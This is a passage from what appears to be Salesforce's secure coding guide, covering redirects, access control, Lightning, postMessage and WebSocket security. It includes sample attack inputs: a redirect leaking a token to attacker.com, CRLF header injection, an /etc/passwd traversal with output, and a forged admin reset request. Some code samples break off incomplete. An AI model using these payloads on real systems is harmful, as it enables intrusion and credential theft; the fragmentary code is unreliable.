into providing their credentials to evil.com.
Another risk is abusing redirects to leak sensitive data that is stored in GET requests using the referrer
header.
This time let’s take a look at a client side redirect example:
https://example.com/index.jsp?secretToken=81dc9bdb52d04dc2003#auth.jsp
The redirect URL is a part of the hash fragment and is used by a client side javascript to perform the
redirection to the desired page :
<script>
var retURL = location.hash.substring(1);
window.location = retURL;
</script>
The value can be controlled by the user which means that an attacker can change the value to redirect
to his own site.
https://example.com/index.jsp?secretToken=81dc9bdb52d04dc2003#http://attacker.com
The request will now be sent to “attacker.com” along with the Referer header value which is the URL of
the page that performed the redirect. In this case the Referer contains sensitive data that is now being
sent to the attacker.
Host: attacker.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/index.jsp?token=3423434234
Depending on your application and on your application framework, arbitrary redirects may also cause
a response splitting vulnerability: if the attacker provides %0d%0a (\r\n) in the right request
parameter, and those characters make it into the HTTP Location: header, the attacker can control HTTP
headers after the insertion point and can control the HTTP response body. If the malicious request is:
https://www.example.com/login.jsp?page=something%0d%0aSet-Cookie:+some+evil+data
64
Arbitrary Redirect
Sample Vulnerability
This C# code shows a simple example of an arbitrary redirect:
// ...
string url =
request.QueryString["url"];
// ...
Response.Redirect(url);
Is My Application Vulnerable?
If your application has a redirection mechanism and does not already address the problem by limiting
redirection (preferably by means of an allowlist, a mechanism that restricts redirects to known-good
URIs), then it is likely to be vulnerable.
65
Arbitrary Redirect
if (!good)
throw new Exception("Dubious host name in
URL!");
Response.Redirect(url);
ASP.NET
Follow general guidance and audit any usage of Response.Redirect().
Java
Follow general guidance and audit any usage of HttpServletResponse.sendRedirect().
PHP
Follow general guidance and audit any usage of header('location: <URL>') and fopen().
An additional protection step is a setting in php.ini called allow_url_fopen can be used to control
if the fopen() is allowed to open URL schemes. If this is not being done in the code normally, it should
be set to off.
Ruby on Rails
Follow general guidance and audit any usage of redirect_to().
66
CHAPTER 9 Authorization and Access Control
Sample Vulnerability
Directory Traversal:
Consider the following URL:
https://www.example.com/index.php?page=login
67
Authorization and Access Control
A directory traversal attack to display the /etc/passwd file can be executed by changing the URL to:
https://www.example.com/index.php?page=../../../../../../../etc/passwd
Example response:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
In this sample the attacker gained read access to the /etc/passwd file.
Authorization:
Consider a HTTP request for an administrator to reset the password of a user:
POST /admin/resetPassword.jsp HTTP/1.1
Host: www.example.com
[HTTP Headers]
user=admin&newpassword=password
If an attacker could perform an identical request and the web application resets the admin account's
password, this is an example of bypassing an authorization mechanism because this capability was only
intended for administrators of www.example.com. In a sense, this is also a privilege escalation issue since
a non-administrator can perform administrative password reset functionality and obtain access to the
administrator account with the new password.
Is My Application Vulnerable?
It is not unusual for a web application to read, write, and execute files via scripts as part of the functionality
they provide. As with other input validation vulnerabilities, protecting against directory traversal requires
that developers take proactive steps to validate user input before it is executed. If this has not been done,
your application may be vulnerable.
All web applications provide access to resources by definition. If your web application includes a login
page, has a logical division between roles/groups, and has functionality restricted to only certain types
of users such as administrators, your web application may be vulnerable unless carefully engineered.
68
Authorization and Access Control
spiders that can locate hidden content and pages intended to only be used by authorized users. Never
assume an attacker does not know the entire layout of your web application.
Testing for authorization and access control vulnerabilities varies greatly from application to application.
In general, using a proxy and staying alert for information being passed about the logical roles, accounts,
and groups in a web application can identify how authorization and access control is enforced in a web
application. Conduct an investigation of the web application driven by questions like:
• What pages are used for authenticating a user?
• What roles/groups exist for the web application?
• What are the capabilities/resources of each role/group?
• What mechanisms are used to grant access to the role/group, and does it actively check that a
request is from an authenticated role/group member?
• What happens when incorrect role/group data is supplied to the mechanisms?
• What happens when the information of other role/group data is supplied to these mechanisms?
• What happens when a user of the site modifies their own role/group data with a proxy before
submission to a mechanism?
• What assumptions are being made and what does a member of the product security team think
about these assumptions?
Some commercial tools, such as IBM Rational AppScan, have the capability to differentiate between
pages that only certain roles can reach, though tools such as these are expensive. When configured with
an understanding of the divisions of your site, it can attempt to detect authorization vulnerabilities by
recognizing when a role can access a page that should have been restricted to another role.
69
Authorization and Access Control
70
Authorization and Access Control
authenticated session information for each user so that cross checks may be performed to determine
whether that user should be allowed access to a given resource. The caveat is that care must be taken
when configuring sessions since the defaults are insecure. The default settings of how PHP handles
sessions must be changed in php.ini. Change the following settings to the values below:
session.hash_function = 1
session.entropy_file = /dev/urandom
session.entropy_length = 64
PHP has a special setting in php.ini called open_basedir. This setting can be used to restrict PHP file
opening, writing, and deletion to a specified directory tree. By default this setting is turned off, and the
necessity to use it depends on your server configuration. For example, PHP running as an Apache module
on a secured configuration of Apache will inherit Apache's limited directory permissions, so it might not
be necessary to use it in that case. It can be used in the following manner:
open_basedir = '/home/www/public_html'
These functions take filenames as parameters, and should be traced back to verify if the parameters were
properly validated.
If these functions are not required by your web application, it is possible to disable them in php.ini using
the disable_functions setting. This is a common technique to prevent command injection by blocking
a list of commands that might execute user data as instructions for a shell. It can be used in the following
manner:
disable_functions = fopen, readfile, system, exec, passthru,
shell_exec, proc_open
Another setting in php.ini that can be used is allow_url_include. This setting controls if files on remote
URLs can be included via include() and require(). If this is not necessary, it should be set to off.
71
CHAPTER 10 Lightning Security
Directive Summary
default-src 'self' Default policy that resources may be only loaded from the same domain
(lightning.force.com or lightning.com).
script-src 'self' Scripts may only be loaded from the same domain (no external script
loads). Use static resources to store all scripts.
'unsafe-inline' Inline JavaScript is not blocked by the CSP but is blocked in the security
review as future CSP settings will not allow unsafe-inline. Do not write
any code using inline JS in order to prevent your components from
malfunctioning when CSP is tightened.
object-src 'self' <object> <embed> and <applet> elements can only be loaded from
the same domain (use static resources).
style-src 'self' CSS styles can only be loaded from the same domain (use static
resources).
img-src 'self' Images can only be loaded from the same domain.
img-src 'http:' 'https:' 'data:' Images can only be loaded via http, https, or data URIs. The security
review requires https.
media-src 'self' Audio and video elements can only be loaded from the same domain.
frame-ancestors https: The page can be embedded only via an https parent frame.
72
Lightning Security
font-src https: data: Fonts can be loaded via https and data URIs.
connect-src 'self' XHR callbacks and websockets can only connect back to the same
domain.
'unsafe-eval' eval() and related reflection operations are not blocked by the CSP but
are blocked in the AppExchange security review.
Note: As of Spring ’19 (API version 45.0), you can build Lightning components using two
programming models: the Lightning Web Components model, and the original Aura Components
model. Lightning web components are custom HTML elements built using HTML and modern
JavaScript. Lightning web components and Aura components can coexist and interoperate on a
page.
In addition to CSP directives, secure components also meet the following restrictions.
Component attributes must not Modify attributes from a Components should not modify
be changed during a render cycle controller method or a helper their own attributes in a
to avoid render loops. method called by a controller renderedCallback.
method.
Components must properly load Use the ltng:require component. Use the
resources like scripts and lightning/platformResourceLoader
stylesheets instead of using module
script or link tags.
Components must not override Aura components must not Lightning web components must
native window or document override window or document not override window or
functions. functions. document functions
Inline JavaScript must only be Aura component method Lightning web component
used for methods in the method
<div
component markup. For example
onmouseover="{!c.myControllerFunction}">foo</div> <div
<div onmouseover={myComponentFunction}>foo</div>
onmouseover=”myFunction”>foo</div>
73
Lightning Security
You should also be familiar with the restrictions listed in Security with Lightning Locker.
When you submit a Lightning component or app for security review, include all source JavaScript files
in static resources, as we cannot review minified code directly. Failure to do so delays the review of your
components until we get the appropriate source files. This also applies to sources that compile to
JavaScript.
Component Security Boundaries and Encapsulation
In Apex, every method that is annotated @AuraEnabled should be treated as a webservice interface.
That is, the developer should assume that an attacker can call this method with any parameter, even if
the developer's client-side code does not invoke the method or invokes it using only sanitized parameters.
Therefore the parameters of an @AuraEnabled method should:
• not be placed into a SOQL query unsanitized
• not be trusted to specify which fields and objects a user can access
Whenever an @AuraEnabled method modifies sObjects, full CRUD/FLS as well as sharing checks should
be made to ensure that the client does not elevate their privileges when invoking this method. These
checks need to be performed on the server (in Apex). Note that this is different than the situation with
Visualforce, in which CRUD/FLS checks can be performed for you by the Visualforce presentation layer.
This means porting code from Visualforce to Lightning requires the addition of CRUD/FLS checks each
time an sObject is accessed.
Because Lightning components are meant to be re-usable and shareable, each global or public attribute
should be viewed as untrusted from the point of view of the component's internal logic. In other words,
don't take the contents of an attribute and render them directly to the DOM via innerHTML or $().html().
It does not matter whether, in your app, the attributes are provided by another component you control.
When you need to perform a raw HTML write or set an href attribute, then the attribute must be marked
sanitized in your JavaScript code.
An important aspect to understand is how session authentication works for your AuraEnabled
components. If an Experience Cloud site user's session expires, and the rendered page contains Lightning
components that can invoke custom Apex methods (AuraEnabled), the methods are invoked as the
site's guest user. Plan your implementation to either provide/revoke access to the site guest user or to
monitor for session time-outs to invoke login requests as needed.
Access Control in Apex Controllers and Supporting Classes
When Lightning components invoke server-side controllers, the developer must ensure that the server-side
read/write operations don’t subvert the organization's security policy as set by the user's profile and
sharing permissions. All access control enforcement must occur server-side, because the client is under
the control of the attacker. Fortunately you can ensure that your server-side code is safe to use with
Lightning components by taking some additional steps when writing your Apex classes.
Sharing in Apex Classes
74
Lightning Security
All controller classes must have the with sharing keyword. There are no exceptions. In some cases,
your code needs to elevate privileges beyond those of the logged in user. For example, you may have
a method that returns summary data computed over fields that the logged-in user cannot access. In this
case, the controller must still use the with sharing keyword, but a specific Aura-enabled method
may call a helper method in a class that is explicitly marked without sharing. All privileged operations
should be placed into these helper classes, and each privileged helper class should perform a single
privileged function and no unprivileged functions. All other classes must be with sharing.
public class ExpenseController() { //Unsafe
@AuraEnabled
public static String getSummary() {
doPrivilegedOp() //should not be here
}
}
@AuraEnabled
public static String getSummary() {
HelperClass.doPrivilegedOp()
}
}
Avoid ambiguous sharing policies that make auditing difficult, particularly in large apps with complex
control flows. Write apps in such a way that an auditor who looks at a class that performs a database
operation can quickly and accurately determine if the database operation respects user permissions. All
global classes, classes that expose webservices, or allow for remote invocation (such as Aura Enabled
classes and remote action classes) must always use the with sharing keyword. The exception is
for controller classes in sites, including Experience Cloud sites, where a with sharing policy could
force the granting of excessive permissions to guest users.
CRUD/FLS Enforcement
CRUD/FLS permissions aren’t automatically enforced in Lightning components or controllers. You can’t
rely on Lightning components to enforce security as the client is under the control of the attacker, so all
security checks must always be performed server-side. You must explicitly check for isAccessible(),
isUpdateable()i, isCreateable(), and isDeletable() prior to performing these
operations on sObjects.
public with sharing class ExpenseController {
75
Lightning Security
ns__Date__c,
ns__Reimbursed__c, CreatedDate FROM ns__Expense__c];
}
@AuraEnabled
public static List<ns__Expense__c> getExpenses() { //safe
String [] expenseAccessFields = new String [] {'Id',
'Name',
'ns__Amount__c',
'ns__Client__c',
'ns__Date__c',
'ns__Reimbursed__c',
'CreatedDate'
};
Map<String,Schema.SObjectField> m =
Schema.SObjectType.ns__Expense__c.fields.getMap();
}
}
76
Lightning Security
that validation in the Aura-enabled server-side controller is also insufficient as users can use the SOAP/REST
API to modify objects directly, bypassing the Apex Controller as well as the UI.
Object Validation Concerns
When Aura enabled methods receive objects as input types, you must validate the fields within those
objects, since any fields could be set by the client. Here’s a typical vulnerable example.
@AuraEnabled
public static Account insertAccount(Account a){
// We expect only Name to be set
if(Schema.SObjectType.Account.fields.Name.isUpdatable()){
insert a; // <== problem: if Account "a" includes other
fields
// or custom fields they will also be set.
return a;
}
To do this, you must iterate through all populated fields and check FLS on those fields.
@AuraEnabled
public static Account respectFLS(Account a){
Map<String, Schema.SObjectField> fieldMap =
Schema.SObjectType.Account.fields.getMap();
Map<String, Object> fieldsToValue =
a.getPopulatedFieldsAsMap();
for(String fieldKey : fieldsToValue.keySet() ) {
// if this populated field is not accessible, throw an
error
if(! fieldMap.get(fieldKey).getDescribe().isUpdateable())
{
throw new SecurityException('Invalid fields');
}
}
insert a;
return a;
}
77
Lightning Security
The key is that the DML operation not be performed without an event stemming from human interaction,
such as a click. CSRF only applies to server-side DML operations, not operations that update client-side
component attributes.
Cross Site Scripting
Component markup is rendered differently than standard Visualforce markup (which is rendered
server-side) or javascript micro-templating frameworks (which are usually rendered with innerHTML).
In Lightning, component markup must be valid xhtml, and the markup is parsed and rendered to the
DOM with standard DOM accessors such as setAttribute and textContent. Therefore no html parsing
occurs during component markup rendering, and there is no possibility of breaking out of attribute
values or nodeValues. When attributes are interpolated into markup, they can only occur as attribute
values or the text content of DOM nodes. Lightning attribute values cannot be inserted as attribute
names, or portions of attribute values. This means certain constructions that would be valid in Visualforce
or most micro-templating frameworks are invalid aura expressions, and most of the remaining
constructions are automatically safe:
<div>Here is a <b> {!v.myvalue} </b> bold value</div> <!-- always
safe-->
<div title="{!v.myvalue}">a div</div> <!-- always safe-->
<div title="{!v.myvalue}">a div</div> <!-- always safe-->
<div {!v.myvalue}>a div</div> <!-- will not compile-->
<div title="Here is a {!v.myvalue}">a div</div> <!-- will not
compile -->
<div title="{!'Here is a ' + v.myvalue}">a div</div> <!-- always
safe-->
Because of this, no encoding is ever performed by the framework when rendering component markup,
nor are any encoding functions provided by the framework.
However, there is still the possibility of using unsafe attributes:
<a href="{!v.foo}">click</a> //unsafe: foo=javascript:..
<iframe src="{!v.foo}"/> //unsafe: foo=javascript:..
The following is a partial list of unsafe combinations of tags and attributes that should be avoided, if
possible within lightning component markup in order to avoid assigning unsafe values to lightning
attributes:
78
Lightning Security
This is only a partial list. See html5sec.org for more information about possible unsafe attributes. Of the
above unsafe constructions, two are commonly used in component markup, namely anchor tags as well
as style tags. There are several options for sanitizing these attributes.
Anchor tags can be sanitized when relative URLs are used:
<a href="{!v.foo}">click</a> //unsafe: foo=javascript:..
<a href="{!'/' + v.foo}">click</a> //forces scheme to be https or
http
with controller:
({
sanitizeUrl : function(cmp, event, helper) {
var el = document.createElement('a');
el.href = ('getParam' in event) ?
event.getParam('value') : cmp.get('v.attr');
if (el.protocol !== 'https:') {
cmp.set('v.attr', ' ');
}
})
Note that the scheme is parsed by the browser rather than with string handling functions. Also note
that both the init and change events must be filtered to make sure that only controlled schemes are
rendered or re-rendered in your component's markup.
Because the binding between component markup and lightning attributes is automatic, unless you
intercept value changes, your code cannot sanitize attributes set from outside your component. Moreover,
it is a bad practice to rely on the code that instantiates or interacts with your component to pass you
safe values. Relying on the caller to give you data that is safe creates a security dependency between
79
Lightning Security
the internal structure of your component and all of the possible callers. In large applications, this typically
results in failure to sanitize some input.
Because the above sanitization technique is heavyweight, it is preferable to use only relative URLs in
component markup, or to use only private attributes (for example, if the URL is pulled from a URL type
on the server).
For style tags, CSS as a language is difficult to sanitize in such a way as to prevent style injection. Moreover,
the 'type' fields within lightning attributes are not enforced -- e.g. field marked 'Boolean' may well contain
strings, etc. Therefore it is a bad practice to pass attribute values to style tags. Instead use tokens, private
attributes, or javascript to manage style changes.
Within javascript, the same cross site scripting issues are possible as with any other javascript code. Be
aware that no encoding functions are provided, so if you must use html rendering functions, then place
a third-party encoding library such as secureFilters into your helper (loading this library via static resources
creates some race conditions that add complexity to your code). Then, use the secureFilters.html function
to sanitize external data passed to rendering functions or third-party libraries that use rendering functions:
rerender: function(cmp, event, helper) {
var el = cmp.find("xyz").getElementById("abc");
var myattr = cmp.get("v.myattr");
el.innerHTML = "<b>" + myattr +"</b>"; //unsafe
el.innerHTML = "<b>" + cmp.helper.secureFilters.html(myattr)
+"</b>"; //safe
and place the secureFilters code into your helper. Alternately, use an html encoding function that
performs the same substitution operations as secureFilters' html() function.
If in the future, encoding functions are provided natively by the framework, this section will be updated
with new instructions. Don’t roll your own encoding functions.
Don’t rely on CSP to prevent XSS, as the presence of CSP policies will depend on how your component
is surfaced and what the organization's policies are, which is subject to change at runtime. Additionally,
CSP will not protect your code from html or style injection.
For more information about general XSS issues, see our Secure Coding Guidelines on page 4.
Arbitrary Redirect
When redirecting to a third-party side:
1. Use HTTPS.
2. Ensure that the domain is hard coded into the source or stored in a custom setting. Storing the
domain in a custom object field is not considered sufficient protection.
Secret Inputs
In Visualforce, user password entry should be performed with <apex:inputSecret> tags. The
Lightning equivalent for this is the <ui:inputSecret /> component.
Third-Party Frameworks
Check out this blogpost about using third-party frameworks within Lightning Locker.
80
CHAPTER 11 Marketing Cloud Engagement API
Integration Security
For the most part we treat the Marketing Cloud Engagement API as any other API that you can integrate
your Salesforce apps with. Here are a few additional things to keep in mind as you design and develop
your integration:
Enforce least privilege
Make sure to request minimum required scope for the OAuth token for your app API token. This would
follow the principle of least privilege and reduce the risk associated with the API token.
Secure storage
Make sure to only store the refresh token on your external web server. Make sure to keep the access
token only in memory and requesting a new access token when needed. Make sure to follow industry
best practice for secure storage of refresh token on the external platform you are using. The refresh token
should be treated like a Salesforce credential.
Secure in transit
Make sure to always enforce TLS when making API calls to the MC APIs. Make sure to only provide the
access token as the Authorization header and never as query parameters. Make sure to maintain up to
date TLS configurations on your external web server.
Prohibited API endpoints
Please do not make use of the XML API. This API is no longer supported and is not compatible with
Enterprise 2.0 accounts. The AppExchange does not allow apps that make use of the XML API on the
marketplace.
https://help.exacttarget.com/en/technical_library/xml_api/exacttarget_xml_api_technical_reference/
For general guidelines around web application pentesting for your composite app, review the OWASP
Top Ten checklist. Here are some specific issues to look out for when building composite apps:
Authentication (Session management)
Authentication and session management needs to be correctly implemented. That means using secure
procedures to create, manage and end a session for each authorized user. Session IDs should be properly
rotated out and set with the correct cookie flags. Always prefer to use your framework’s session
management features as they’re thoroughly tested and more frequently updated.
https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management
Access Control
The app needs to verify the user’s session and permission levels before giving access to any restricted
data or function. For example, this could be a standard user accessing admin-level setting pages, or user
A viewing user B’s purchase history.
• https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control
• https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
Sensitive Information in errors
The correct handling of errors and responses are critical in avoiding most of the fingerprinting and
enumeration process by a possible attacker. Common error responses such as stack traces and debug
81
Marketing Cloud Engagement API Integration Security
logs should be hidden from the user because an attacker can use this to gain more information about
the server/application.
https://www.owasp.org/index.php/Improper_Error_Handling
Cross Site Request Forgery (CSRF)
This vulnerability is used by attackers to trick an authenticated user to perform an unwanted action on
the target vulnerable server. To achieve this, the attacker crafts a URL or a FORM inside a malicious page,
and trick the target victim to access to it. CSRF attacks typically target state-changing requests as there
is no way for the attacker to see the response of the forged request.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
HTML injection and Cross Site Scripting (XSS)
HTML injection vulnerabilities occur when an attacker can inject their own HTML code in a vulnerable
website, and make it appear as if it is originally there. For example, the attacker may be able to inject an
<iframe> and display a completely different page. Cross Site Scripting is a vulnerability where an attacker
can inject their own javascript (instead of just HTML) that executes in the context of a vulnerable domain.
The attacker can then craft a payload and trick a victim to visit the link and the attacker’s Javascript will
execute on the victim’s browser.
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Arbitrary Redirects
The vulnerable server perform a redirect function using user controlled data in some URL. This allows
the attacker to use a normal-looking server URL to redirect a victim to a malicious site. In addition, if your
site uses one page to perform forwards to other resources, an attacker could modify the input parameter
and bypass permission checks.
https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards
Remote Code Execution
The web app or server is running some code vulnerable to specially crafted input data, that entails the
execution of commands in the target machine. This can be achieved normally from three basic sources:
Web server is running some vulnerable service listening to open ports on the internet: Check if every
service that is listening at a port on your web server is not vulnerable or it has any public working exploit.
Web app is using vulnerable components: Double check every software package (gems, nodes,libraries...)
that you are using in your app to support functionality like process documents, process images, open
connections (like external URI), parse XML. Application is processing user input as serialized data. Execute
deserialized user data with caution as it could lead to remote code execution.
https://www.owasp.org/index.php/Command_Injection
Using Insecure Software
Most applications use some kind of third-party components, such as Javascript libraries, server side
frameworks and application servers. Ensure you are using the latest available version with no known
security vulnerabilities. Vulnerable versions are easy to identify and can open up your application to a
broader attack surface.
https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities
SQL Injection
A SQL injection attack consists of insertion, or "injection", of a SQL query via the input data from the
client to the application. SQL injection attacks are a type of injection attack, in which SQL commands
are injected as a part of user supplied input in order to effect the execution of predefined SQL commands.
82
Marketing Cloud Engagement API Integration Security
https://www.owasp.org/index.php/Top_10_2013-A1-Injection
Storage of sensitive Data
Sensitive data such as passwords, credit card information, Social Security Numbers and other PII need
to be securely stored on the server using the industry best practice for secure storage on your platform.
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure
83
CHAPTER 12 Secure Coding PostMessage
A secure postMessage invocation example to send a message to another domain is provided below:
In the code example above, the sender has access to the window object for the intended recipient. There
are various mechanisms by which the sender can get the javascript handle to a target window, so we
will skip that.
• "This is a message" is the actual message that is sent to the recipient window. It can be any object
and not just a string message.
• "https://salesforce.com" is the target domain to which the message must be delivered. If the recipient
window has navigated to a different domain, the browser will discard the message and not deliver
it, ensuring confidentiality of the information.
You can also specify "*" as the target domain name if you want to send your message to any domain
on the target window. That is an insecure use of postMessage API and must be avoided. If the target
window navigates to a new origin, your message may end up being delivered to a malicious domain
resulting in information leakage.
It is important to always specify the precise target origin while sending postMessage(s). You can also
use '/' as target origin if you want the receiving origin to be the same as the sending origin.
Receiver
Since any origin can send messages to your window and message handlers, it is recommended to accept
messages only from domains on an allowlist. Failure to check source origin can result in cross site scripting,
information leakage or denial of service attacks on your application. It is also recommended to validate
the format of incoming data prior to processing. Always assume that the received messages are malicious
and program defensively.
An example secure implementation to process incoming messages may look as follows:
window.addEventListener("message", processMessages);
function processMessages(event) {
84
Secure Coding PostMessage
// do something
} else {
// ignore message or throw error
}
}
To summarize postMessage API is a powerful developer tool and must be used with caution. General
guidelines for its use are:
• While sending messages
– Provide a specific destination origin unless there is a need to broadcast your message to all
domains
References:
• whatwg.org web messaging
• Mozilla developer
85
CHAPTER 13 Secure Coding WebSockets
Secure WebSockets
WebSocket is a full duplex communication protocol introduced in HTML5, allowing real-time data
exchange between the web browsers (or other clients) and the server. A WebSocket connection is
established after a WebSocket handshake between client and the server. The handshake happens over
the HTTP protocol.
As with all new technologies, WebSocket presents some interesting security challenges for which we
have discussed the countermeasures below.
Implement Strong Countermeasures against Cross-Site WebSocket Hijacking (CSWSH) Attacks
Per design, WebSocket connections are not restricted by Same Origin Policy. This allows WebSocket
connections to establish and exchange data between different origins. The specification does not offer
any advice on the authentication mechanism.
Let us assume that your web application uses ambient client credentials like cookies, client SSL certificates
or HTTP authentication, to protect its WebSocket communication. In this case, when a cross origin
WebSocket connection is established, the browsers automatically sends these credentials along with
the request. The server then authenticates the client and returns the requested data, allowing cross
domain data retrieval and SOP bypass.
Specifically Enforce that the Origin header matches only one of the domains on the allowlist. All modern
browsers add the Origin request header to cross origin requests, so this should be easy to implement.
Consider implementing custom authentication mechanisms like OAuth, SAML etc… to authenticate
WebSockets. Send the values of these headers in custom HTTP request headers for your application. This
prevents the browser from automatically appending client credentials to the WebSocket requests.
Implementing this countermeasure protects in the scenarios when Origin header validation is difficult
to support for any number of reasons.
Always use WSS WebSocket defines two new URI schemes, ws and wss. wss:// is secure and ws:// is
inherently insecure. The ws:// sends all data over unencrypted channel and must not be used. Web
applications must always use wss:// for WebSockets which is a secure protocol and relies on Transport
Layer Security to provide security to the communication channel. In addition to that, the code that
performs WebSocket connections must be delivered over HTTPS to prevent sslstrip like MiTM attacks.
Example code to create a secure WebSocket:
var webSocket = new
WebSocket("wss://www.salesforce.com/OAuthProtectedResource")
References
• WebSocket
• Heroku - Websocket Security
• Cross Site Web Socket Hijacking - Christian Schneider
86
CHAPTER 14 Platform Security FAQs
Get answers to common security questions for the App Cloud platform and understand common false
positive findings from third-party Security Assessments against the App Cloud platform.
Secure Cookies
Certain cookies served from the salesforce.com domain aren’t set as secure or set as persistent. This is
intentional.
There are several cookies that the platform uses to enhance functionality that don’t contain any session
information. If an attacker accesses or alters those cookies, they can’t use the cookies to gain access or
escalate privilege in Salesforce.
The session cookie "sid" is marked as secure and is non-persistent. In other words, the cookie is deleted
when the browser is closed.
Data validation
Data validation or data quality issues don’t fall under security. However, some customers wonder why
data from some input fields aren’t validated server-side as part of saving that data in an object.
Most default data validation and quality rules are enforced on the client side. For example, when you
update a picklist value to a non-defined value via the API, or when you modify a standard page edit
POST.
Here are some examples of data validation rules that are enforced server side.
• Setting a lookup ID to a non-existent record ID.
• Data type for a field e.g cannot set a number field with text values.
• Object Validation Rules or Apex Triggers that validate data.
Clickjacking
Clickjacking is a type of attack that tricks users into clicking something, such as a button or link. The click
sends an HTTP request that performs malicious actions that can lead to data intrusion, unauthorized
emails, changed credentials, or similar results. To help protect against this kind of attack, most Salesforce
pages can only be served in an inline frame by a page on the same domain.
Experience Cloud sites have two clickjack protection parts—one for the Experience Cloud site, which is
set from the Salesforce site detail page, and another for the Site.com site, which is set from the Site.com
configuration page. It's recommended that both are set to the same value.
For more information, see Configure Clickjack Protection in Salesforce Help.
87
Platform Security FAQs
Cross-Site Scripting
All standard pages output encode user-controlled data in the proper context.
For Visualforce pages, all merge fields are HTML encoded by default.
Any cross-site scripting vulnerabilities that occur from custom Visualforce pages must be addressed with
best practice recommendations and tools provided for developers.
Apex and Visualforce provide additional encoding utilities for other contexts. Developers are responsible
for the proper output encoding for other non-html contexts. See Cross Site Scripting (XSS) in the Apex
Developer Guide
The platform implements context-specific output encoding for user-controlled data. Salesforce data can
be presented in a multitude of contexts and systems, which makes it challenging to successfully anticipate
the correct context for data at input time.
Standard pages are designed to properly encode data in the correct context in which the data is displayed.
If input encoding is required, you can implement custom triggers on desired objects and fields. For more
information, see Secure Coding Cross Site Scripting
File Upload
We’re aware that it is possible for malicious users to upload files that contain malicious content and that
a user who downloads the file can be compromised if antivirus software doesn’t detect the malicious
code.
Files stored in Salesforce aren’t scanned for malicious content. The data is stored as binary on Salesforce
servers. Certain file types are parsed for search indexing or for preview display and controls have been
put in place to ensure the process occurs in an isolated environment with limited privileges.
To protect the platform, files and attachments are stored within the services in such a manner that if
something was uploaded which was infected, it has no effect on the rest of the service or other files
because of the way it is stored. Salesforce can’t control the customer's end points, and it is a customer
responsibility to ensure that those endpoints have up-to-date antivirus protection.
The app layer is abstracted from the infrastructure layer via our multi-tenant model, hence the reason
we are speaking to two different parts, the infrastructure layer we manage and protect, and the app
layer where users are able to upload anything they want in a secure manner. Salesforce can't control
whether the user chooses to upload an infected file, or whether of some of our customers intentionally
upload items that are known to be infected.
88
Platform Security FAQs
Certain file types and upload and download behavior can be managed via File Upload and Download
Security in Setup. For other file types, custom Apex triggers on related objects can limit the file extensions
uploaded.
For more information, see Configure File Upload and Download Security Settings in Salesforce Help and
the Configure the setting 'File Upload and Download Security' knowledge article.
To monitor files and URLs that are uploaded to or downloaded from Salesforce, you can also use external
add-ons.
FRONTDOOR.JSP SID
The frontdoor.jsp SID used via login.salesforce.com is a temporary session that can’t be used upon login.
Salesforce is aware of the ability to log in via frontdoor.jsp?sid=<sessionid> via the API.
(You can’t use the temporary session ID, but the SID created it upon login.)
For more information about this behavior, see Using Frontdoor.jsp to Bridge an Existing Session Into
Salesforce in Salesforce Help.
JSESSIONID
JSESSIONID is a temporary session ID and the cookie can’t be exploited. The main session cookie is the
SID and it is marked secure.
89
Platform Security FAQs
HTTP Header:
Content-Security-Policy (CSP) frame-ancestors Directive
Clickjacking uses a trusted domain or site to trick users into clicking a malicious link. With clickjacking,
the trusted domain is served in an iframe, then a hidden or transparent UI control is served in the same
location. For example, a transparent button on top of the Save button. The user thinks that they’re clicking
the top-level iframe when they’re really clicking the hidden UI control.
To protect your users, Salesforce uses clickjack protection. For pages that Salesforce serves, clickjack
protection is implemented through the Content-Security-Policy (CSP) HTTP response header
frame-ancestors directive. That directive tells the browser which sites are allowed to load the
page in an iframe.
Note: The CSP frame-ancestors header directive replaces the obsolete X-Frame-Options header.
For more information, see X-Frame-Options on the Mozilla Developer Network.
By default, Visualforce pages can be loaded in an iframe. For Visualforce pages with headers, the
CSP frame-ancestors HTTP response header directive is absent. We highly recommend that you enable
clickjack protection for your Visualforce pages and specify the trusted domains for inline frames for other
features. For more information, see Configure Clickjack Protection in Salesforce Help.
90
Platform Security FAQs
The frame-ancestor directive indicates that only salesforce.com and force.com can include an IFRAME
of Salesforce services.
Note: HSTS is enabled for authenticated traffic only on the App Servers (your Salesforce instance).
If you serve your Experience Cloud sites or Salesforce Sites on a registrable custom domain, such as
https://example.com, you can include the HSTS HTTP header in the headers for your custom domain
via a setting. See Enable HSTS Preloading on a Custom Domain in Salesforce Help.
91